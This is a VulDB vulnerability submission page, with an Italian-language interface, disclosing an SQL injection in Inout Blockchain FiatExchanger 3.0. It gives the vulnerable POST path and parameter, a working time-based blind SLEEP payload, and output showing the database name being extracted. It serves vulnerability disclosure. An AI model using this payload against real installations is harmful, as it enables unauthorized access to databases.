Invia #177560: Inout Blockchain FiatExchanger 3.0 - SQL Injectioninformazioni

TitoloInout Blockchain FiatExchanger 3.0 - SQL Injection
Descrizione# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ # Version: 3.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /index.php/coins/update_marketboxslider ---------------------------------------------- POST /index.php/coins/update_marketboxslider HTTP/2 marketcurrency=[SQLI]&displaylimit=4 ---------------------------------------------- POST parameter 'marketcurrency' is vulnerable to SQL Injection --- Parameter: marketcurrency (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_fiatexchanger_**' [-] Done
Utente
 skalvin (UID 49463)
Sottomissione04/07/2023 17:58 (3 anni fa)
Moderazione11/07/2023 17:26 (7 days later)
StatoAccettato
Voce VulDB233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency iniezione SQL]
Punti17

Do you know our Splunk app?

Download it now for free!